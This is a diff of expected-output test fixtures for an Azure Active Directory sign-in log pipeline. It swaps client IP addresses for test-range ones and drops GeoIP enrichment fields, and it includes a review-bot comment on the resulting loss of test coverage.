"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d137a5e4-7004-493a-acca-5fb167d1f207\",\"InterSystemsId\":\"cf2168a1-6537-4ed6-80a5-797c3458180c\",\"IntraSystemId\":\"23f53edd-63a7-4292-9d80-4fbc49c11e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -8612,25 +7490,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "79.159.10.151"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -8644,7 +7504,7 @@
 "ObjectId": "Unknown",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Redirect",
@@ -8694,7 +7554,7 @@
 "asr"
 ],
 "ip": [
- "79.159.10.151"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -8706,12 +7566,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051723700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:20\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"73f0a2ef-35be-4a71-9545-59d879fc8fb2\",\"InterSystemsId\":\"d21f6867-0670-4c94-b6fa-bde326fcf3c6\",\"IntraSystemId\":\"1fa4819f-605a-4ebe-a2c3-bc11c3f8e200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970400300Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:20\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"73f0a2ef-35be-4a71-9545-59d879fc8fb2\",\"InterSystemsId\":\"d21f6867-0670-4c94-b6fa-bde326fcf3c6\",\"IntraSystemId\":\"1fa4819f-605a-4ebe-a2c3-bc11c3f8e200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -8750,25 +7610,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8782,7 +7624,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -8832,7 +7674,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
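Review bot: In the `@@ -8750,25 +7610,7 @@` hunk the regenerated expectation drops `source.geo` and `source.as` outright instead of replacing them with the lookup result for 67.43.156.15, so this fixture no longer asserts that the pipeline's GeoIP/ASN enrichment of `source.ip` runs at all; a regression that removed or mis-targeted that processor would now pass unnoticed. Whether that is intended depends on the GeoIP test database the test stack loads: if it has no entry for 67.43.156.0/24 the empty result is expected, but if it does (MaxMind's test data normally covers that range) the vanished fields suggest the files were regenerated against a stack without the database, which is worth confirming before merging. Either way, consider keeping at least one event on an address the test database is known to resolve — 89.160.20.128 is mapped to Linköping, SE in MaxMind's City test data, if I recall correctly — so the expected output still carries a `"geo": { ... }` object and the enrichment stays covered. Note also that two distinct original addresses (213.97.47.133 and 83.57.233.151) are both collapsed to 67.43.156.15 across the neighbouring hunks; harmless for per-event pipeline tests, but it loses the "different source per login" shape of the original sample.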
@@ -8844,12 +7686,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051726400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3783acda-5ded-4d69-95b6-3df5344c0ce0\",\"InterSystemsId\":\"d5effb7f-9d39-4893-90f6-9cfeec7ed1a7\",\"IntraSystemId\":\"f22a3ad7-22e7-4296-a600-e4e9161a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970406Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3783acda-5ded-4d69-95b6-3df5344c0ce0\",\"InterSystemsId\":\"d5effb7f-9d39-4893-90f6-9cfeec7ed1a7\",\"IntraSystemId\":\"f22a3ad7-22e7-4296-a600-e4e9161a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -8888,25 +7730,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8920,7 +7744,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -8970,7 +7794,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -8982,12 +7806,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051729100Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:03\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"f67568b1-64c4-4165-bdd9-16a5b9142eef\",\"InterSystemsId\":\"d960e058-1adb-4a84-a65b-1a6ce367e323\",\"IntraSystemId\":\"1dfdb693-18a1-4cff-aa3e-61feaa356100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970433700Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:03\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"f67568b1-64c4-4165-bdd9-16a5b9142eef\",\"InterSystemsId\":\"d960e058-1adb-4a84-a65b-1a6ce367e323\",\"IntraSystemId\":\"1dfdb693-18a1-4cff-aa3e-61feaa356100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -9026,25 +7850,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9058,7 +7864,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -9108,7 +7914,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -9120,12 +7926,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051732100Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a8114a24-d342-4689-b75e-51e6386763de\",\"InterSystemsId\":\"e2565aaf-91b0-4ccd-8810-743123eb7383\",\"IntraSystemId\":\"21166e08-6589-4c2d-a325-c97ba45f2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970437800Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a8114a24-d342-4689-b75e-51e6386763de\",\"InterSystemsId\":\"e2565aaf-91b0-4ccd-8810-743123eb7383\",\"IntraSystemId\":\"21166e08-6589-4c2d-a325-c97ba45f2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -9164,25 +7970,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9196,7 +7984,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -9246,7 +8034,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -9258,12 +8046,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051734700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"1eaf9c65-8c67-4cd9-9277-771589113752\",\"InterSystemsId\":\"ede626b9-2035-4d02-8330-201c4ae82af6\",\"IntraSystemId\":\"98612804-9aa6-40a4-b72a-808bc7742000\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970442700Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"1eaf9c65-8c67-4cd9-9277-771589113752\",\"InterSystemsId\":\"ede626b9-2035-4d02-8330-201c4ae82af6\",\"IntraSystemId\":\"98612804-9aa6-40a4-b72a-808bc7742000\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
